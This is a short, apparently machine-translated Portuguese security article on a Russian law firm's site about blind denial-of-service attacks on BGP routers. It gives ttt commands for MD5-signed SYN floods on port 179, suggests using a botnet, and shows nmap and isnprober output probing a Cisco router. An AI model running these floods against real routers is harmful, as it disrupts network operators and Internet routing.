Москва
+7-929-527-81-33
Вологда
+7-921-234-45-78
Вопрос юристу онлайн Юридическая компания ЛЕГАС Вконтакте

Ataques DoS "cegos" em roteadores BGP. 1

Обновлено 29.09.2025 12:21

Chamaremos de ataques cegos aqueles que não exigem nenhum conhecimento adicional além do endereço IP do roteador BGP. A encenação a mais simples para tal ataque DoS é uma inundação SYN na porta TCP 179. Para implementar tal ataque em um roteador industrial, você precisa usar várias dezenas de computadores, ou melhor ainda, uma botnet.

Uma maneira mais interessante de "inundar" um roteador de destino BGP usando a autenticação MD5 é usar pacotes TCP SYN com assinaturas MD5. Este ataque permite que você adicione a carga computacional ao processamento MD5 pelo roteador atacado.

Tal ataque é fácil de realizar usando o utilitário ttt com a opção md5. Para otimizar a inundação, várias instâncias ttt devem estar em execução em várias dezenas de máquinas.

Aqui está um exemplo de Uso do utilitário ttt:

arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5

allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y

179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191

Falando em equipamentos da Cisco Systems, deve-se mencionar a possibilidade de implementação de ataques ao overflow da pilha TCP/IP do IOS. Scanners de vulnerabilidades como Nmap, hping2 e isnprober podem ser usados para identificar tais vulnerabilidades.

Aqui está um exemplo para um roteador Cisco 2600:

kali# nmap -sS -O -vvvv 192.168.66.215

<skip>

TCP Sequence Prediction: class="truly" random

Difficulty=9999999 (Good luck!)

TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C

<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215

-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --

Using eth0:192.168.77.5

Probing host: 192.168.66.215 on TCP port 23.

Host:port ISN Delta

192.168.66.202:23 -1154503313

192.168.66.202:23 -24125463 1130377850

192.168.66.202:23 2031059534 2055184997

192.168.66.202:23 965205234 -1065854300

192.168.66.202:23 -1974685094 -2939890328

192.168.66.202:23 1760147902 3734832996

192.168.66.202:23 2089287258 329139356

192.168.66.202:23 -923724721 -3013011979

192.168.66.202:23 -934490140 -10765419

192.168.66.202:23 -1262713275 -328223135

Em geral, o protocolo de roteamento BGP versão 4 é parte integrante da Internet moderna e, consequentemente, problemas na operação desse protocolo certamente afetarão o funcionamento da rede global. Portanto, se as atribuições do administrador do sistema incluem a manutenção de roteadores que trabalham com BGP (via de regra, são empresas provedoras), é necessário levar a sério as possíveis ameaças e tomar medidas de proteção contra elas com antecedência.

Petukhov Oleg, advogado de Direito Internacional e proteção de dados pessoais, especialista em informação segurança, proteção de informações e dados pessoais.

Canal do Telegram: https://t.me/protecaodaInformacao

Grupo em Telegram: https://t.me/protecaodaInformacao1

Site: https://legascom.ru

Correio eletrónico: online@legascom.ru

#segurançadaInformação #Segurançadainformação